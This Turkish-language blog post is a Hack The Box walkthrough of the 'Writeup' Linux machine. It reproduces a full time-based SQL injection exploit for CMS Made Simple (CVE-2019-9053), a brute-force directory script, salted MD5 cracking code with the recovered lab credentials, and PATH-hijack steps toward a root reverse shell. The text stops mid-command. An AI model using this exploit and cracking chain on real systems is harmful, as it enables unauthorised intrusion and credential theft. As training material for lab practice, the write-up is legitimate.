{"id":1581,"date":"2021-10-04T22:46:28","date_gmt":"2021-10-04T22:46:28","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1581"},"modified":"2021-10-04T22:46:28","modified_gmt":"2021-10-04T22:46:28","slug":"writeup","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/10\/04\/writeup\/","title":{"rendered":"Writeup"},"content":{"rendered":"<table>\n<thead>\n<tr>\n<th>Makine Ad\u0131<\/th>\n<th>Seviye<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.eu\/machines\/192\" title=\"Writeup\">Writeup<\/a> - HTB<\/td>\n<td>Orta<\/td>\n<td>Linux<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.eu\/storage\/avatars\/ca06c447787b38ec940eb55d5c54b14c.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>nmap taramas\u0131:<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]                                                                            \n\u2514\u2500# nmap -p- -A -T4 10.10.10.138                                                               \nStarting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-10-03 18:36 EDT                                \nStats: 0:01:36 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan                \nSYN Stealth Scan Timing: About 96.12% done; ETC: 18:37 (0:00:04 remaining)                     \nStats: 0:01:50 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan                     \nNSE Timing: About 93.14% done; ETC: 18:37 (0:00:00 remaining)                                  \nNmap scan report for 10.10.10.138                                                              \nHost is up (0.069s latency).                                                                   \nNot shown: 65533 filtered ports                                                                \nPORT   STATE SERVICE VERSION                                                                   \n22\/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)                             \n| ssh-hostkey:                                                                                 \n|   2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)                                 \n|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)                                \n|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)                              \n80\/tcp open  http    Apache httpd 2.4.25 ((Debian))                                            \n| http-robots.txt: 1 disallowed entry                                                          \n|_\/writeup\/                                                                                    \n|_http-server-header: Apache\/2.4.25 (Debian)                                                   \n|_http-title: Nothing here yet.                                                                \nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nAggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 \n(92%), Linux 4.4 (92%), Linux 4.8 (92%)                                                        \nNo exact OS matches for host (test conditions non-ideal).                                      \nNetwork Distance: 2 hops                                                                       \nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel                                        \n\nTRACEROUTE (using port 22\/tcp)                                                                 \nHOP RTT      ADDRESS                                                                           \n1   68.76 ms 10.10.14.1                                                                        \n2   68.83 ms 10.10.10.138                                                                      \n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 112.78 seconds      <\/code><\/pre>\n<p>80'i g\u00f6r\u00fcnce tarama yapmaya ba\u015flayacakt\u0131m ancak belirli tarama i\u015flemleri yap\u0131l\u0131nca portun kapat\u0131ld\u0131\u011f\u0131n\u0131 g\u00f6rd\u00fcm. Belirli bir s\u00fcre servis d\u00fc\u015f\u00fcyor ve daha sonras\u0131nda tekrar a\u00e7\u0131l\u0131yor. Bu \u00e7ok k\u00f6t\u00fc \u00e7\u00fcnk\u00fc dirb, gobuster gibi ara\u00e7lar\u0131 kullanamayaca\u011f\u0131m anlam\u0131na geliyor. Daha sonras\u0131nda taray\u0131c\u0131dan sayfaya gittim. Bir ddos \u00fcr\u00fcn\u00fc kullan\u0131ld\u0131\u011f\u0131n\u0131 s\u00f6ylemi\u015f ve 40* hatalar\u0131 al\u0131nd\u0131\u011f\u0131nda bunu bir ddos olarak d\u00fc\u015f\u00fcn\u00fcp servisi belirli bir s\u00fcre durduruyor. \u0130lk olarak sayfadaki b\u00fct\u00fcn kelimleri \u00e7ektim ve bir wordlist olu\u015fturdum.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.138]\n\u2514\u2500# cewl --lowercase --with-numbers -d 3 http:\/\/10.10.10.138\/ -w wordlist<\/code><\/pre>\n<p>Daha sonras\u0131nda bir python script'i yazd\u0131m. Bu script arac\u0131l\u0131\u011f\u0131yla sunucu 404'ten dolay\u0131 kapat\u0131ld\u0131\u011f\u0131nda belirli bi s\u00fcre bekleyip daha sonras\u0131nda tekrar dosya dizin ke\u015ffine devam ediyordu. Kodum a\u015fa\u011f\u0131da verilmi\u015ftir.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.138]\n\u2514\u2500# cat exploit\/dirbb.py                                                                                                                                                                130 \u2a2f\npath = input(&quot;Dosya ad\u0131:\\r\\n&quot;)\ndosya = open(path)\nwordlist = dosya.read().split(&quot;\\n&quot;)\ndosya.close()\n\ndizi200 = []\nurl = &quot;http:\/\/10.10.10.138\/&quot;\nimport requests\nimport time\nsayac = 0\n#try:\nfor i in wordlist:\n        sayac = sayac + 1\n        try:\n                r = requests.get(url+i)\n                if(r.status_code == &quot;200&quot;):\n                        dizi200.append(url+i)\n                url_ = url + i\n                print(url_,r.status_code)\n        except:\n                print(&quot;ddos script&#039;e yakaland\u0131, bekleniyor!&quot;)\n                time.sleep(60)\n        if(sayac == 5):\n                time.sleep(10)\n                sayac = 0\n                print(&quot;---------------&quot;)\n                for ii in dizi200:\n                        print(ii)\n                print(&quot;---------------&quot;)\n#except:\n#       print(&quot;ddos script&#039;e yakaland\u0131, bekleniyor!&quot;)\n#       time.sleep(60)<\/code><\/pre>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.138]\n\u2514\u2500# python3 exploit\/dirbb.py  \n...\n...\nhttp:\/\/10.10.10.138\/apache 404                                                                                                                                                                \nhttp:\/\/10.10.10.138\/40x 404                                                                                                                                                                   \nhttp:\/\/10.10.10.138\/errors 404                                                                                                                                                                \nhttp:\/\/10.10.10.138\/bans 404                                                                                                                                                                  \n---------------                                                                                                                                                                               \n---------------                                                                                                                                                                               \nddos script&#039;e yakaland\u0131, bekleniyor!                                                                                                                                                          \nddos script&#039;e yakaland\u0131, bekleniyor!                                                                                                                                                          \nhttp:\/\/10.10.10.138\/hope 404                                                                                                                                                                  \nhttp:\/\/10.10.10.138\/get 404                                                                                                                                                                   \nhttp:\/\/10.10.10.138\/hit 404                                                                                                                                                                   \n---------------                                                                                                                                                                               \n---------------                                                                                                                                                                               \nhttp:\/\/10.10.10.138\/false 404                                                                                                                                                                 \nhttp:\/\/10.10.10.138\/positive 404                                                                                                                                                              \nhttp:\/\/10.10.10.138\/drops 404                                                                                                                                                                 \nhttp:\/\/10.10.10.138\/where 404                                                                                                                                                                 \nhttp:\/\/10.10.10.138\/download 404                                                                                                                                                              \n---------------                                                                                                                                                                               \n---------------                                                                                                                                                                               \nhttp:\/\/10.10.10.138\/the 404                                                                                                                                                                   \nhttp:\/\/10.10.10.138\/proper 404                                                                                                                                                                \nhttp:\/\/10.10.10.138\/donkey 404                                                                                                                                                                \nhttp:\/\/10.10.10.138\/please 404                                                                                                                                                                \nhttp:\/\/10.10.10.138\/let 404                                                                                                                                                                   \n---------------                                                                                                                                                                               \n---------------                                                                                                                                                                               \nhttp:\/\/10.10.10.138\/via 404                                                                                                                                                                   \nhttp:\/\/10.10.10.138\/mail 404                                                                                                                                                                  \nhttp:\/\/10.10.10.138\/jkr 404                                                                                                                                                                   \nhttp:\/\/10.10.10.138\/writeup 200    <\/code><\/pre>\n<p><strong><a href=\"http:\/\/10.10.10.138\/writeup\">http:\/\/10.10.10.138\/writeup<\/a><\/strong> adresinde 200 statu code'unu ald\u0131m. Sayfaya gitti\u011fimde sayfan\u0131n kaynak kodlar\u0131n\u0131 incelerken ba\u015fl\u0131k k\u0131sm\u0131nda <strong>CMS Made Simple<\/strong> ifadesini g\u00f6rd\u00fcm. Bunun \u00fczerine yay\u0131nlanm\u0131\u015f bir exploit var m\u0131 diye arad\u0131m.<\/p>\n<pre><code class=\"language-sh\">\n\u2514\u2500# searchsploit CMS Made Simple\n------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\n Exploit Title                                                                                                                                              |  Path\n------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\nCMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Execution (Metasploit)                                                                          | php\/remote\/46627.rb\nCMS Made Simple 0.10 - &#039;index.php&#039; Cross-Site Scripting                                                                                                     | php\/webapps\/26298.txt\nCMS Made Simple 0.10 - &#039;Lang.php&#039; Remote File Inclusion                                                                                                     | php\/webapps\/26217.html\nCMS Made Simple 1.0.2 - &#039;SearchInput&#039; Cross-Site Scripting                                                                                                  | php\/webapps\/29272.txt\nCMS Made Simple 1.0.5 - &#039;Stylesheet.php&#039; SQL Injection                                                                                                      | php\/webapps\/29941.txt\nCMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulnerabilities                                                                                     | php\/webapps\/32668.txt\nCMS Made Simple 1.11.9 - Multiple Vulnerabilities                                                                                                           | php\/webapps\/43889.txt\nCMS Made Simple 1.2 - Remote Code Execution                                                                                                                 | php\/webapps\/4442.txt\nCMS Made Simple 1.2.2 Module TinyMCE - SQL Injection                                                                                                        | php\/webapps\/4810.txt\nCMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upload                                                                                            | php\/webapps\/5600.php\nCMS Made Simple 1.4.1 - Local File Inclusion                                                                                                                | php\/webapps\/7285.txt\nCMS Made Simple 1.6.2 - Local File Disclosure                                                                                                               | php\/webapps\/9407.txt\nCMS Made Simple 1.6.6 - Local File Inclusion \/ Cross-Site Scripting                                                                                         | php\/webapps\/33643.txt\nCMS Made Simple 1.6.6 - Multiple Vulnerabilities                                                                                                            | php\/webapps\/11424.txt\nCMS Made Simple 1.7 - Cross-Site Request Forgery                                                                                                            | php\/webapps\/12009.html\nCMS Made Simple 1.8 - &#039;default_cms_lang&#039; Local File Inclusion                                                                                               | php\/webapps\/34299.py\nCMS Made Simple 1.x - Cross-Site Scripting \/ Cross-Site Request Forgery                                                                                     | php\/webapps\/34068.html\nCMS Made Simple 2.1.6 - &#039;cntnt01detailtemplate&#039; Server-Side Template Injection                                                                              | php\/webapps\/48944.py\nCMS Made Simple 2.1.6 - Multiple Vulnerabilities                                                                                                            | php\/webapps\/41997.txt\nCMS Made Simple 2.1.6 - Remote Code Execution                                                                                                               | php\/webapps\/44192.txt\nCMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated)                                                                                              | php\/webapps\/48779.py\nCMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload                                                                                                | php\/webapps\/48742.txt\nCMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authenticated)                                                                                    | php\/webapps\/48851.txt\nCMS Made Simple 2.2.15 - &#039;title&#039; Cross-Site Scripting (XSS)                                                                                                 | php\/webapps\/49793.txt\nCMS Made Simple 2.2.15 - RCE (Authenticated)                                                                                                                | php\/webapps\/49345.txt\nCMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated)                                                                    | php\/webapps\/49199.txt\nCMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution                                                                                               | php\/webapps\/44976.py\nCMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution                                                                                               | php\/webapps\/45793.py\nCMS Made Simple &lt; 1.12.1 \/ &lt; 2.1.3 - Web Server Cache Poisoning                                                                                             | php\/webapps\/39760.txt\nCMS Made Simple &lt; 2.2.10 - SQL Injection                                                                                                                    | php\/webapps\/46635.py\nCMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload                                                                                            | php\/webapps\/34300.py\nCMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Upload                                                                                       | php\/webapps\/34298.py\nCMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload                                                                              | php\/webapps\/46546.py\n------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\nShellcodes: No Results\nPapers: No Results\n<\/code><\/pre>\n<p>Sqlinjection exploiti buldum ancak python dosyas\u0131n\u0131 d\u00fczenlemem gerekiyordu. Python2ye g\u00f6re yaz\u0131lm\u0131\u015f ve parolay\u0131 k\u0131rarke program \u00e7\u00f6k\u00fcyordu. D\u00fczenlenmi\u015f hali a\u015fa\u011f\u0131da verilmi\u015ftir.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.138\/exploit]                                                                                                                                                      \n\u2514\u2500# cat 46635.py                                                                                                                                                                              \n#!\/usr\/bin\/env python                                                                                                                                                                         \n# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple &lt;= 2.2.9                                                                                                                    \n# Date: 30-03-2019                                                                                                                                                                            \n# Exploit Author: Daniele Scanu @ Certimeter Group                                                                                                                                            \n# Vendor Homepage: https:\/\/www.cmsmadesimple.org\/                                                                                                                                             \n# Software Link: https:\/\/www.cmsmadesimple.org\/downloads\/cmsms\/                                                                                                                               \n# Version: &lt;= 2.2.9                                                                                                                                                                           \n# Tested on: Ubuntu 18.04 LTS                                                                                                                                                                 \n# CVE : CVE-2019-9053                                                                                                                                                                         \n\nimport requests                                                                                                                                                                               \nfrom termcolor import colored                                                                                                                                                                 \nimport time                                                                                                                                                                                   \nfrom termcolor import cprint                                                                                                                                                                  \nimport optparse                                                                                                                                                                               \nimport hashlib                                                                                                                                                                                \n\nparser = optparse.OptionParser()                                                                                                                                                              \nparser.add_option(&#039;-u&#039;, &#039;--url&#039;, action=&quot;store&quot;, dest=&quot;url&quot;, help=&quot;Base target uri (ex. http:\/\/10.10.10.100\/cms)&quot;)   \nparser.add_option(&#039;-w&#039;, &#039;--wordlist&#039;, action=&quot;store&quot;, dest=&quot;wordlist&quot;, help=&quot;Wordlist for crack admin password&quot;)                                                                     [127\/205]\nparser.add_option(&#039;-c&#039;, &#039;--crack&#039;, action=&quot;store_true&quot;, dest=&quot;cracking&quot;, help=&quot;Crack password with wordlist&quot;, default=False)                                                                  \n\noptions, args = parser.parse_args()                                                                                                                                                           \nif not options.url:                                                                                                                                                                           \n    print(&quot;[+] Specify an url target&quot;)                                                                                                                                                        \n    print(&quot;[+] Example usage (no cracking password): exploit.py -u http:\/\/target-uri&quot;)                                                                                                        \n    print(&quot;[+] Example usage (with cracking password): exploit.py -u http:\/\/target-uri --crack -w \/path-wordlist&quot;)                                                                            \n    print(&quot;[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.&quot;)                                                                                \n    exit()                                                                                                                                                                                    \n\nurl_vuln = options.url + &#039;\/moduleinterface.php?mact=News,m1_,default,0&#039;                                                                                                                       \nsession = requests.Session()                                                                                                                                                                  \ndictionary = &#039;1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$&#039;                                                                                                            \nflag = True                                                                                                                                                                                   \npassword = &quot;&quot;                                                                                                                                                                                 \ntemp_password = &quot;&quot;                                                                                                                                                                            \nTIME = 1                                                                                                                                                                                      \ndb_name = &quot;&quot;                                                                                                                                                                                  \noutput = &quot;&quot;                                                                                                                                                                                   \nemail = &quot;&quot;                                                                                                                                                                                    \n\nsalt = &#039;&#039;                                                                                                                                                                                     \nwordlist = &quot;&quot;                                                                                                                                                                                 \nif options.wordlist:                                                                                                                                                                          \n    wordlist += options.wordlist                                                                                                                                                              \n\ndef crack_password():                                                                                                                                                                         \n    global password                                                                                                                                                                           \n    global output                                                                                                                                                                             \n    global wordlist                                                                                                                                                                           \n    global salt                                                                                                                                                                               \n    dict = open(wordlist, encoding=&#039;latin-1&#039;)                                                                                                                                                 \n    for line in dict.readlines():                                                                                                                                                             \n        line = line.replace(&quot;\\n&quot;, &quot;&quot;)                                                                                                                                                         \n        beautify_print_try(line)                                                                                                                                                              \n        if hashlib.md5(str.encode(str(salt)) + str.encode(line)).hexdigest() == password:                                                                                                     \n            output += &quot;\\n[+] Password cracked: &quot; + line                                                                                                                                       \n            break                                                                                                                                                                             \n    dict.close()                                                                                                                                                                              \n\ndef beautify_print_try(value):                                                                                                                                                                \n    global output   \n    print(&quot;\\033c&quot;)                                                                                                                                                                    [84\/205]\n    cprint(output,&#039;green&#039;, attrs=[&#039;bold&#039;])                                                                                                                                                    \n    cprint(&#039;[*] Try: &#039; + value, &#039;red&#039;, attrs=[&#039;bold&#039;])                                                                                                                                        \n\ndef beautify_print():                                                                                                                                                                         \n    global output                                                                                                                                                                             \n    print(&quot;\\033c&quot;)                                                                                                                                                                            \n    cprint(output,&#039;green&#039;, attrs=[&#039;bold&#039;])                                                                                                                                                    \n\ndef dump_salt():                                                                                                                                                                              \n    global flag                                                                                                                                                                               \n    global salt                                                                                                                                                                               \n    global output                                                                                                                                                                             \n    ord_salt = &quot;&quot;                                                                                                                                                                             \n    ord_salt_temp = &quot;&quot;                                                                                                                                                                        \n    while flag:                                                                                                                                                                               \n        flag = False                                                                                                                                                                          \n        for i in range(0, len(dictionary)):                                                                                                                                                   \n            temp_salt = salt + dictionary[i]                                                                                                                                                  \n            ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]                                                                                                                            \n            beautify_print_try(temp_salt)                                                                                                                                                     \n            payload = &quot;a,b,1,5))+and+(select+sleep(&quot; + str(TIME) + &quot;)+from+cms_siteprefs+where+sitepref_value+like+0x&quot; + ord_salt_temp + &quot;25+and+sitepref_name+like+0x736974656d61736b)+--+&quot;  \n            url = url_vuln + &quot;&amp;m1_idlist=&quot; + payload                                                                                                                                          \n            start_time = time.time()                                                                                                                                                          \n            r = session.get(url)                                                                                                                                                              \n            elapsed_time = time.time() - start_time                                                                                                                                           \n            if elapsed_time &gt;= TIME:                                                                                                                                                          \n                flag = True                                                                                                                                                                   \n                break                                                                                                                                                                         \n        if flag:                                                                                                                                                                              \n            salt = temp_salt                                                                                                                                                                  \n            ord_salt = ord_salt_temp                                                                                                                                                          \n    flag = True                                                                                                                                                                               \n    output += &#039;\\n[+] Salt for password found: &#039; + salt                                                                                                                                        \n\ndef dump_password():                                                                                                                                                                          \n    global flag                                                                                                                                                                               \n    global password                                                                                                                                                                           \n    global output                                                                                                                                                                             \n    ord_password = &quot;&quot;                                                                                                                                                                         \n    ord_password_temp = &quot;&quot;                                                                                                                                                                    \n    while flag:                                                                                                                                                                               \n        flag = False     \n        for i in range(0, len(dictionary)):                                                                                                                                           [41\/205]\n            temp_password = password + dictionary[i]                                                                                                                                          \n            ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]                                                                                                                    \n            beautify_print_try(temp_password)                                                                                                                                                 \n            payload = &quot;a,b,1,5))+and+(select+sleep(&quot; + str(TIME) + &quot;)+from+cms_users&quot;                                                                                                         \n            payload += &quot;+where+password+like+0x&quot; + ord_password_temp + &quot;25+and+user_id+like+0x31)+--+&quot;                                                                                        \n            url = url_vuln + &quot;&amp;m1_idlist=&quot; + payload                                                                                                                                          \n            start_time = time.time()                                                                                                                                                          \n            r = session.get(url)                                                                                                                                                              \n            elapsed_time = time.time() - start_time                                                                                                                                           \n            if elapsed_time &gt;= TIME:                                                                                                                                                          \n                flag = True                                                                                                                                                                   \n                break                                                                                                                                                                         \n        if flag:                                                                                                                                                                              \n            password = temp_password                                                                                                                                                          \n            ord_password = ord_password_temp                                                                                                                                                  \n    flag = True                                                                                                                                                                               \n    output += &#039;\\n[+] Password found: &#039; + password                                                                                                                                             \n\ndef dump_username():                                                                                                                                                                          \n    global flag                                                                                                                                                                               \n    global db_name                                                                                                                                                                            \n    global output                                                                                                                                                                             \n    ord_db_name = &quot;&quot;                                                                                                                                                                          \n    ord_db_name_temp = &quot;&quot;                                                                                                                                                                     \n    while flag:                                                                                                                                                                               \n        flag = False                                                                                                                                                                          \n        for i in range(0, len(dictionary)):                                                                                                                                                   \n            temp_db_name = db_name + dictionary[i]                                                                                                                                            \n            ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:]                                                                                                                      \n            beautify_print_try(temp_db_name)                                                                                                                                                  \n            payload = &quot;a,b,1,5))+and+(select+sleep(&quot; + str(TIME) + &quot;)+from+cms_users+where+username+like+0x&quot; + ord_db_name_temp + &quot;25+and+user_id+like+0x31)+--+&quot;                             \n            url = url_vuln + &quot;&amp;m1_idlist=&quot; + payload                                                                                                                                          \n            start_time = time.time()                                                                                                                                                          \n            r = session.get(url)                                                                                                                                                              \n            elapsed_time = time.time() - start_time                                                                                                                                           \n            if elapsed_time &gt;= TIME:                                                                                                                                                          \n                flag = True                                                                                                                                                                   \n                break                                                                                                                                                                         \n        if flag:                                                                                                                                                                              \n            db_name = temp_db_name         \n            ord_db_name = ord_db_name_temp\n    output += &#039;\\n[+] Username found: &#039; + db_name\n    flag = True\n\ndef dump_email():\n    global flag\n    global email\n    global output\n    ord_email = &quot;&quot;\n    ord_email_temp = &quot;&quot;\n    while flag:\n        flag = False\n        for i in range(0, len(dictionary)):\n            temp_email = email + dictionary[i]\n            ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]\n            beautify_print_try(temp_email)\n            payload = &quot;a,b,1,5))+and+(select+sleep(&quot; + str(TIME) + &quot;)+from+cms_users+where+email+like+0x&quot; + ord_email_temp + &quot;25+and+user_id+like+0x31)+--+&quot;\n            url = url_vuln + &quot;&amp;m1_idlist=&quot; + payload\n            start_time = time.time()\n            r = session.get(url)\n            elapsed_time = time.time() - start_time\n            if elapsed_time &gt;= TIME:\n                flag = True\n                break\n        if flag:\n            email = temp_email\n            ord_email = ord_email_temp\n    output += &#039;\\n[+] Email found: &#039; + email\n    flag = True\n\ndump_salt()\ndump_username()\ndump_email()\ndump_password()\n\nif options.cracking:\n    print(colored(&quot;[*] Now try to crack password&quot;))\n    crack_password()\n\nbeautify_print()\n<\/code><\/pre>\n<p>Kodu \u00e7al\u0131\u015ft\u0131rd\u0131\u011f\u0131mda a\u015fa\u011f\u0131daki \u00e7\u0131kt\u0131lar\u0131 ald\u0131m.<\/p>\n<pre><code class=\"language-sh\">\n#[+] Salt for password found: 5a599ef579066807\n#[+] Username found: jkr\n#[+] Email found: jkr@writeup.htb\n#[+] Password found: 62def4866937f08cc13bab43bb14e6f7<\/code><\/pre>\n<p>Daha sonras\u0131nda kodun i\u00e7erisindeki hash'i k\u0131rma k\u0131sm\u0131n\u0131 ayr\u0131 bir python koduna kaydettim ve k\u0131rma i\u015flemini kendim yapt\u0131m. Python kodu a\u015fa\u011f\u0131da verilmi\u015ftir.<\/p>\n<pre><code class=\"language-sh\">import hashlib\ndef crack_password():\n    password = &quot;62def4866937f08cc13bab43bb14e6f7&quot;\n    wordlist = &quot;\/usr\/share\/wordlists\/rockyou.txt&quot;\n    salt = &quot;5a599ef579066807&quot;\n    dict = open(wordlist, encoding=&quot;latin-1&quot;)\n    for line in dict.readlines():\n        line = line.replace(&quot;\\n&quot;, &quot;&quot;)\n#        beautify_print_try(line)\n        if hashlib.md5(str.encode(str(salt)) + str.encode(line)).hexdigest() == password:\n            print(&quot;\\n[+] Password cracked: &quot; + line)\n            break\n    dict.close()\n\ncrack_password()<\/code><\/pre>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/10.10.10.138\/exploit]                                                       \n\u2514\u2500# python3 crack.py\n\n[+] Password cracked: raykayjay9<\/code><\/pre>\n<p>Ssh ile ba\u011flant\u0131 yapt\u0131\u011f\u0131mda user flag'i okudum.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# ssh jkr@10.10.10.138                   \njkr@10.10.10.138&#039;s password: \nLinux writeup 4.9.0-8-amd64 x86_64 GNU\/Linux\n\nThe programs included with the Devuan GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDevuan GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\njkr@writeup:~$ pwd\n\/home\/jkr\njkr@writeup:~$ ls\nuser.txt\njkr@writeup:~$ cat user.txt\n846446f10caff03660d3ef24705e13ec\njkr@writeup:~$ \n<\/code><\/pre>\n<p>\u0130\u00e7eride bir tak\u0131m kontroller ger\u00e7ekle\u015ftirdim ki bana g\u00f6re python k\u00fct\u00fcphanlerini kullanarak root olmam\u0131z laz\u0131m ancak ba\u015far\u0131l\u0131 olmad\u0131. Bunun sebebini ger\u00e7ekten anlam\u015f de\u011filim. Neyse...<\/p>\n<p>Makineye pspy arac\u0131n\u0131 att\u0131m ve processleri g\u00f6r\u00fcnt\u00fclemeye ba\u015flad\u0131m.<\/p>\n<pre><code class=\"language-sh\">\njkr@writeup:\/tmp$ wget http:\/\/10.10.14.21\/pspy32s\n--2021-10-04 18:38:52--  http:\/\/10.10.14.21\/pspy32s\nConnecting to 10.10.14.21:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 1090528 (1.0M) [application\/octet-stream]\nSaving to: \u2018pspy32s\u2019\n\npspy32s                 100%[==============================&gt;]   1.04M   559KB\/s    in 1.9s    \n\n2021-10-04 18:38:54 (559 KB\/s) - \u2018pspy32s\u2019 saved [1090528\/1090528]\n\njkr@writeup:\/tmp$ chmod 777 pspy32s\n<\/code><\/pre>\n<p>ssh ba\u011flant\u0131s\u0131 yapt\u0131\u011f\u0131mda olu\u015fan process'ler a\u015fa\u011f\u0131da verilmi\u015ftir..<\/p>\n<pre><code class=\"language-sh\">\n2021\/10\/04 18:40:01 CMD: UID=0    PID=2059   | \/usr\/sbin\/CRON \n2021\/10\/04 18:40:01 CMD: UID=0    PID=2060   | \/bin\/sh -c \/root\/bin\/cleanup.pl &gt;\/dev\/null 2&gt;&amp;1 \n2021\/10\/04 18:40:05 CMD: UID=0    PID=2061   | sshd: [accepted]\n2021\/10\/04 18:40:05 CMD: UID=0    PID=2062   | sshd: [accepted]  \n2021\/10\/04 18:40:09 CMD: UID=0    PID=2063   | sshd: jkr [priv]  \n2021\/10\/04 18:40:09 CMD: UID=0    PID=2064   | sh -c \/usr\/bin\/env -i PATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin run-parts --lsbsysinit \/etc\/update-motd.d &gt; \/run\/motd.dynamic.new \n2021\/10\/04 18:40:09 CMD: UID=0    PID=2065   | run-parts --lsbsysinit \/etc\/update-motd.d \n2021\/10\/04 18:40:09 CMD: UID=0    PID=2066   | \/bin\/sh \/etc\/update-motd.d\/10-uname \n2021\/10\/04 18:40:09 CMD: UID=0    PID=2067   | sshd: jkr [priv]  \n<\/code><\/pre>\n<p>G\u00f6r\u00fcld\u00fc\u011f\u00fc \u00fczere <strong>run-parts<\/strong> isimli program bir path belirtilmeden \u00e7al\u0131\u015ft\u0131r\u0131lm\u0131\u015f.<\/p>\n<p>PATH'e bakt\u0131\u011f\u0131m\u0131zda:<\/p>\n<pre><code class=\"language-sh\">\njkr@writeup:\/tmp$ echo $PATH\n\/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/local\/games:\/usr\/games<\/code><\/pre>\n<p>Ayr\u0131ca yazailece\u011fimiz pathlere bakt\u0131\u011f\u0131m\u0131zda:<\/p>\n<pre><code class=\"language-sh\">\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Interesting GROUP writable files (not in Home) (max 500)\n\u255a https:\/\/book.hacktricks.xyz\/linux-unix\/privilege-escalation#writable-files\n  Group jkr:\n\/tmp\/linpeas.sh\n  Group cdrom:\n\n  Group floppy:\n\n  Group audio:\n\n  Group dip:\n\n  Group video:\n\n  Group plugdev:\n\n  Group staff:\n\/var\/local\n\/usr\/local\n\/usr\/local\/bin\n\/usr\/local\/include\n\/usr\/local\/share\n\/usr\/local\/share\/sgml\n\/usr\/local\/share\/sgml\/misc\n\/usr\/local\/share\/sgml\/stylesheet\n\/usr\/local\/share\/sgml\/entities\n\/usr\/local\/share\/sgml\/dtd\n\/usr\/local\/share\/sgml\/declaration\n\/usr\/local\/share\/fonts\n\/usr\/local\/share\/ca-certificates\n\/usr\/local\/share\/man\n\/usr\/local\/share\/emacs\n\/usr\/local\/share\/emacs\/site-lisp\n\/usr\/local\/share\/xml\n\/usr\/local\/share\/xml\/schema\n\/usr\/local\/share\/xml\/misc\n\/usr\/local\/share\/xml\/entities\n\/usr\/local\/share\/xml\/declaration\n\/usr\/local\/games\n\/usr\/local\/lib\/python3.5\n\/usr\/local\/lib\/python3.5\/dist-packages\n\/usr\/local\/lib\/python2.7\n\/usr\/local\/lib\/python2.7\/dist-packages\n\/usr\/local\/lib\/python2.7\/site-packages\n\/usr\/local\/sbin<\/code><\/pre>\n<p>Path'i manip\u00fcle edebilece\u011fimzi g\u00f6rebiliyoruz. Bir reverse shell olu\u015fturup root olal\u0131m.<\/p>\n<pre><code class=\"language-sh\">\njkr@writeup:\/tmp$ echo $PATH\n\/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/local\/games:\/usr\/games\njkr@writeup:\/tmp$ cd 